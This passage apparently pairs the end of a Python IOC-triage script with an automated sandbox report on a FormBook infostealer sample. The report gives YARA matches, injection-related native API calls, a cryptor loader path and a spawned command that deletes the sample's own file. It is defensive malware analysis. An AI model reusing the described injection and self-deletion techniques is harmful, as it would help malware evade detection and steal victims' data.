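    for r in triage():
        print(f'{r["host"]:28} {r["host_role"]:8} {r["verdict"]}')
```

The host role matters for response: a hit on the C2 host is an IOC to block outright, while a hit on a decoy host is evidence of the same infection but the domain itself is usually a legitimate site the malware author picked as cover, so blocking it is not useful and may break things.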

E-Banking Fraud:

Yara detected FormBook
Source: Yara match, file source: 2.2.mvui1vY6Mo.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 0.2.mvui1vY6Mo.exe.2eb0000.1.unpack, type: UNPACKEDPE
Source: Yara match, file source: 0.2.mvui1vY6Mo.exe.2eb0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 2.2.mvui1vY6Mo.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match, file source: 0000000B.00000002.915140274.0000000000B70000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, file source: 00000002.00000002.745894672.0000000001B70000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, file source: 0000000B.00000002.915098041.0000000000B10000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, file source: 00000000.00000002.660274297.0000000002EB0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, file source: 00000002.00000002.745860975.0000000001B40000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, file source: 00000002.00000002.744663875.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, file source: 0000000B.00000002.914915179.00000000008A0000.00000040.00000001.sdmp, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)
Source: 2.2.mvui1vY6Mo.exe.400000.1.raw.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.mvui1vY6Mo.exe.400000.1.raw.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 0.2.mvui1vY6Mo.exe.2eb0000.1.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.mvui1vY6Mo.exe.2eb0000.1.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 0.2.mvui1vY6Mo.exe.2eb0000.1.raw.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.mvui1vY6Mo.exe.2eb0000.1.raw.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 2.2.mvui1vY6Mo.exe.400000.1.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.mvui1vY6Mo.exe.400000.1.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000002.915140274.0000000000B70000.00000004.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000B.00000002.915140274.0000000000B70000.00000004.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.745894672.0000000001B70000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.745894672.0000000001B70000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000002.915098041.0000000000B10000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000B.00000002.915098041.0000000000B10000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.660274297.0000000002EB0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.660274297.0000000002EB0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.745860975.0000000001B40000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.745860975.0000000001B40000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.744663875.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.744663875.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000002.914915179.00000000008A0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000B.00000002.914915179.00000000008A0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: C:\Users\user\Desktop\mvui1vY6Mo.exe, Code function: 2_2_004181D0 NtCreateFile
Source: C:\Users\user\Desktop\mvui1vY6Mo.exe, Code function: 2_2_00418280 NtReadFile
Source: C:\Users\user\Desktop\mvui1vY6Mo.exe, Code function: 2_2_00418300 NtClose
Source: C:\Users\user\Desktop\mvui1vY6Mo.exe, Code function: 2_2_004183B0 NtAllocateVirtualMemory
Source: C:\Users\user\Desktop\mvui1vY6Mo.exe, Code function: 2_2_004183AB NtAllocateVirtualMemory
Source: C:\Users\user\Desktop\mvui1vY6Mo.exe, Code function: 2_2_018799A0 NtCreateSection, LdrInitializeThunk
Source: C:\Users\user\Desktop\mvui1vY6Mo.exe, Code function: 2_2_018795D0 NtClose, LdrInitializeThunk
Source: C:\Users\user\Desktop\mvui1vY6Mo.exe, Code function: 2_2_01879910 NtAdjustPrivilegesToken, LdrInitializeThunk
Source: C:\Users\user\Desktop\mvui1vY6Mo.exe, Code function: 2_2_01879540 NtReadFile, LdrInitializeThunk
Source: C:\Users\user\Desktop\mvui1vY6Mo.exe, Code function: 2_2_018798F0 NtReadVirtualMemory, LdrInitializeThunk
Source: C:\Users\user\Desktop\mvui1vY6Mo.exe, Code function: 2_2_01879840 NtDelayExecution, LdrInitializeThunk
Source: C:\Users\user\Desktop\mvui1vY6Mo.exe, Code function: 2_2_01879860 NtQuerySystemInformation, LdrInitializeThunk
Source: C:\Users\user\Desktop\mvui1vY6Mo.exe, Code function: 2_2_01879780 NtMapViewOfSection, LdrInitializeThunk
Source: C:\Users\user\Desktop\mvui1vY6Mo.exe, Code function: 2_2_018797A0 NtUnmapViewOfSection, LdrInitializeThunk
Source: C:\Users\user\Desktop\mvui1vY6Mo.exe, Code function: 2_2_01879FE0 NtCreateMutant, LdrInitializeThunk
Source: C:\Users\user\Desktop\mvui1vY6Mo.exe, Code function: 2_2_01879710 NtQueryInformationToken, LdrInitializeThunk
Source: C:\Users\user\Desktop\mvui1vY6Mo.exe, Code function: 2_2_018796E0 NtFreeVirtualMemory, LdrInitializeThunk
Source: C:\Users\user\Desktop\mvui1vY6Mo.exe, Code function: 2_2_01879A00 NtProtectVirtualMemory, LdrInitializeThunk
Source: C:\Users\user\Desktop\mvui1vY6Mo.exe, Code function: 2_2_01879A20 NtResumeThread, LdrInitializeThunk
Source: C:\Users\user\Desktop\mvui1vY6Mo.exe, Code function: 2_2_01879A50 NtCreateFile, LdrInitializeThunk
Source: C:\Users\user\Desktop\mvui1vY6Mo.exe, Code function: 2_2_01879660 NtAllocateVirtualMemory, LdrInitializeThunk
Source: C:\Users\user\Desktop\mvui1vY6Mo.exe, Code function: 2_2_018799D0 NtCreateProcessEx
Source: C:\Users\user\Desktop\mvui1vY6Mo.exe, Code function: 2_2_018795F0 NtQueryInformationFile
Source: C:\Users\user\Desktop\mvui1vY6Mo.exe, Code function: 2_2_01879520 NtWaitForSingleObject
Source: C:\Users\user\Desktop\mvui1vY6Mo.exe, Code function: 2_2_0187AD30 NtSetContextThread
Source: C:\Users\user\Desktop\mvui1vY6Mo.exe, Code function: 2_2_01879950 NtQueueApcThread
Source: C:\Users\user\Desktop\mvui1vY6Mo.exe, Code function: 2_2_01879560 NtWriteFile
Source: C:\Users\user\Desktop\mvui1vY6Mo.exe, Code function: 2_2_018798A0 NtWriteVirtualMemory
Source: C:\Users\user\Desktop\mvui1vY6Mo.exe, Code function: 2_2_01879820 NtEnumerateKey
Source: C:\Users\user\Desktop\mvui1vY6Mo.exe, Code function: 2_2_0187B040 NtSuspendThread
Source: C:\Users\user\Desktop\mvui1vY6Mo.exe, Code function: 2_2_0187A3B0 NtGetContextThread
Source: C:\Users\user\Desktop\mvui1vY6Mo.exe, Code function: 2_2_01879B00 NtSetValueKey
Source: C:\Users\user\Desktop\mvui1vY6Mo.exe, Code function: 2_2_0187A710 NtOpenProcessToken
Source: C:\Users\user\Desktop\mvui1vY6Mo.exe, Code function: 2_2_01879730 NtQueryVirtualMemory
Source: C:\Users\user\Desktop\mvui1vY6Mo.exe, Code function: 2_2_01879760 NtOpenProcess
Source: C:\Users\user\Desktop\mvui1vY6Mo.exe, Code function: 2_2_01879770 NtSetInformationFile
Source: C:\Users\user\Desktop\mvui1vY6Mo.exe, Code function: 2_2_0187A770 NtOpenThread
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_01879A80 NtOpenDirectoryObject,2_2_01879A80
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_018796D0 NtCreateKey,2_2_018796D0
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_01879610 NtEnumerateValueKey,2_2_01879610
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_01879A10 NtQuerySection,2_2_01879A10
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_01879650 NtQueryValueKey,2_2_01879650
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_01879670 NtQueryInformationProcess,2_2_01879670
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048795D0 NtClose,LdrInitializeThunk,11_2_048795D0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04879540 NtReadFile,LdrInitializeThunk,11_2_04879540
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048796D0 NtCreateKey,LdrInitializeThunk,11_2_048796D0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048796E0 NtFreeVirtualMemory,LdrInitializeThunk,11_2_048796E0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04879650 NtQueryValueKey,LdrInitializeThunk,11_2_04879650
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04879660 NtAllocateVirtualMemory,LdrInitializeThunk,11_2_04879660
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04879780 NtMapViewOfSection,LdrInitializeThunk,11_2_04879780
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04879FE0 NtCreateMutant,LdrInitializeThunk,11_2_04879FE0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04879710 NtQueryInformationToken,LdrInitializeThunk,11_2_04879710
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04879840 NtDelayExecution,LdrInitializeThunk,11_2_04879840
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04879860 NtQuerySystemInformation,LdrInitializeThunk,11_2_04879860
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048799A0 NtCreateSection,LdrInitializeThunk,11_2_048799A0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04879910 NtAdjustPrivilegesToken,LdrInitializeThunk,11_2_04879910
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04879A50 NtCreateFile,LdrInitializeThunk,11_2_04879A50
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048795F0 NtQueryInformationFile,11_2_048795F0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04879520 NtWaitForSingleObject,11_2_04879520
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0487AD30 NtSetContextThread,11_2_0487AD30
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04879560 NtWriteFile,11_2_04879560
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04879610 NtEnumerateValueKey,11_2_04879610
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04879670 NtQueryInformationProcess,11_2_04879670
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048797A0 NtUnmapViewOfSection,11_2_048797A0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0487A710 NtOpenProcessToken,11_2_0487A710
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04879730 NtQueryVirtualMemory,11_2_04879730
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04879760 NtOpenProcess,11_2_04879760
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0487A770 NtOpenThread,11_2_0487A770
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04879770 NtSetInformationFile,11_2_04879770
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048798A0 NtWriteVirtualMemory,11_2_048798A0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048798F0 NtReadVirtualMemory,11_2_048798F0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04879820 NtEnumerateKey,11_2_04879820
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0487B040 NtSuspendThread,11_2_0487B040
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048799D0 NtCreateProcessEx,11_2_048799D0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04879950 NtQueueApcThread,11_2_04879950
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04879A80 NtOpenDirectoryObject,11_2_04879A80
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04879A00 NtProtectVirtualMemory,11_2_04879A00
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04879A10 NtQuerySection,11_2_04879A10
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04879A20 NtResumeThread,11_2_04879A20
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0487A3B0 NtGetContextThread,11_2_0487A3B0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04879B00 NtSetValueKey,11_2_04879B00
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_008B81D0 NtCreateFile,11_2_008B81D0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_008B8280 NtReadFile,11_2_008B8280
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_008B83B0 NtAllocateVirtualMemory,11_2_008B83B0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_008B8300 NtClose,11_2_008B8300
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_008B83AB NtAllocateVirtualMemory,11_2_008B83AB
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe -- Code function: String function: 0183B150 appears 35 times
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe -- Code function: String function: 002F17D0 appears 46 times
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe -- Code function: String function: 002F4F91 appears 36 times
          Source: C:\Windows\SysWOW64\cmmon32.exe -- Code function: String function: 0483B150 appears 35 times
          Source: mvui1vY6Mo.exe, 00000000.00000003.651762525.00000000031C6000.00000004.00000001.sdmp -- Binary or memory string: OriginalFilenamentdll.dllj% vs mvui1vY6Mo.exe
          Source: mvui1vY6Mo.exe, 00000002.00000002.746750846.0000000003899000.00000040.00000001.sdmp -- Binary or memory string: OriginalFilenameCMMON32.exe` vs mvui1vY6Mo.exe
          Source: mvui1vY6Mo.exe, 00000002.00000002.745559030.000000000192F000.00000040.00000001.sdmp -- Binary or memory string: OriginalFilenamentdll.dllj% vs mvui1vY6Mo.exe
          Source: mvui1vY6Mo.exe -- Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 2.2.mvui1vY6Mo.exe.400000.1.raw.unpack, type: UNPACKEDPE -- Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.mvui1vY6Mo.exe.400000.1.raw.unpack, type: UNPACKEDPE -- Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.mvui1vY6Mo.exe.2eb0000.1.unpack, type: UNPACKEDPE -- Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.mvui1vY6Mo.exe.2eb0000.1.unpack, type: UNPACKEDPE -- Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.mvui1vY6Mo.exe.2eb0000.1.raw.unpack, type: UNPACKEDPE -- Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.mvui1vY6Mo.exe.2eb0000.1.raw.unpack, type: UNPACKEDPE -- Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.mvui1vY6Mo.exe.400000.1.unpack, type: UNPACKEDPE -- Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.mvui1vY6Mo.exe.400000.1.unpack, type: UNPACKEDPE -- Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000002.915140274.0000000000B70000.00000004.00000001.sdmp, type: MEMORY -- Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.915140274.0000000000B70000.00000004.00000001.sdmp, type: MEMORY -- Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.745894672.0000000001B70000.00000040.00000001.sdmp, type: MEMORY -- Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.745894672.0000000001B70000.00000040.00000001.sdmp, type: MEMORY -- Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000002.915098041.0000000000B10000.00000040.00000001.sdmp, type: MEMORY -- Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.915098041.0000000000B10000.00000040.00000001.sdmp, type: MEMORY -- Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.660274297.0000000002EB0000.00000040.00000001.sdmp, type: MEMORY -- Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.660274297.0000000002EB0000.00000040.00000001.sdmp, type: MEMORY -- Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.745860975.0000000001B40000.00000040.00000001.sdmp, type: MEMORY -- Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.745860975.0000000001B40000.00000040.00000001.sdmp, type: MEMORY -- Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.744663875.0000000000400000.00000040.00000001.sdmp, type: MEMORY -- Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.744663875.0000000000400000.00000040.00000001.sdmp, type: MEMORY -- Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000002.914915179.00000000008A0000.00000040.00000001.sdmp, type: MEMORY -- Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.914915179.00000000008A0000.00000040.00000001.sdmp, type: MEMORY -- Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engine -- Classification label: mal100.troj.evad.winEXE@8/0@7/5
          Source: C:\Windows\System32\conhost.exe -- Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6400:120:WilError_01
          Source: mvui1vY6Mo.exe -- Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe -- Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exe -- File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\SysWOW64\cmmon32.exe -- File read: C:\Windows\System32\drivers\etc\hosts
          Source: mvui1vY6Mo.exe -- Virustotal: Detection: 58%
          Source: mvui1vY6Mo.exe -- ReversingLabs: Detection: 60%
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe -- File read: C:\Users\user\Desktop\mvui1vY6Mo.exe
          Source: unknown -- Process created: C:\Users\user\Desktop\mvui1vY6Mo.exe 'C:\Users\user\Desktop\mvui1vY6Mo.exe'
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe -- Process created: C:\Users\user\Desktop\mvui1vY6Mo.exe 'C:\Users\user\Desktop\mvui1vY6Mo.exe'
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe -- Process created: C:\Windows\SysWOW64\cmmon32.exe C:\Windows\SysWOW64\cmmon32.exe
          Source: C:\Windows\SysWOW64\cmmon32.exe -- Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\mvui1vY6Mo.exe'
          Source: C:\Windows\SysWOW64\cmd.exe -- Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: mvui1vY6Mo.exe -- Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
          Source: mvui1vY6Mo.exe -- Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
          Source: mvui1vY6Mo.exe -- Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
          Source: mvui1vY6Mo.exe -- Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: mvui1vY6Mo.exe -- Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
          Source: mvui1vY6Mo.exe -- Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
          Source: mvui1vY6Mo.exe -- Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: cmmon32.pdb source: mvui1vY6Mo.exe, 00000002.00000002.746740818.0000000003890000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000004.00000000.708388219.0000000005A00000.00000002.00000001.sdmp
          Source: Binary string: C:\xampp\htdocs\Cryptor\0238f0732c6a40e5a54bccb37ef03c58\Loader\Project1\Release\Project1.pdb source: mvui1vY6Mo.exe
          Source: Binary string: cmmon32.pdbGCTL source: mvui1vY6Mo.exe, 00000002.00000002.746740818.0000000003890000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: mvui1vY6Mo.exe, 00000000.00000003.655268474.0000000003240000.00000004.00000001.sdmp, mvui1vY6Mo.exe, 00000002.00000002.745274685.0000000001810000.00000040.00000001.sdmp, cmmon32.exe, 0000000B.00000002.915794120.0000000004810000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: mvui1vY6Mo.exe, cmmon32.exe
          Source: Binary string: wscui.pdb source: explorer.exe, 00000004.00000000.708388219.0000000005A00000.00000002.00000001.sdmp
          Source: mvui1vY6Mo.exe -- Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
          Source: mvui1vY6Mo.exe -- Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
          Source: mvui1vY6Mo.exe -- Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
          Source: mvui1vY6Mo.exe -- Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
          Source: mvui1vY6Mo.exe -- Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe -- Code function: 0_2_002F1816 push ecx; ret 0_2_002F1829
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe -- Code function: 2_2_002F1816 push ecx; ret 2_2_002F1829
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe -- Code function: 2_2_0041B3C5 push eax; ret 2_2_0041B418
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe -- Code function: 2_2_0041B47C push eax; ret 2_2_0041B482
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe -- Code function: 2_2_0041B412 push eax; ret 2_2_0041B418
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe -- Code function: 2_2_0041B41B push eax; ret 2_2_0041B482
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe -- Code function: 2_2_00414E34 push eax; iretd 2_2_00414E36
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exe -- Code function: 2_2_00414F6B push ebp; retf 2_2_00414F6C
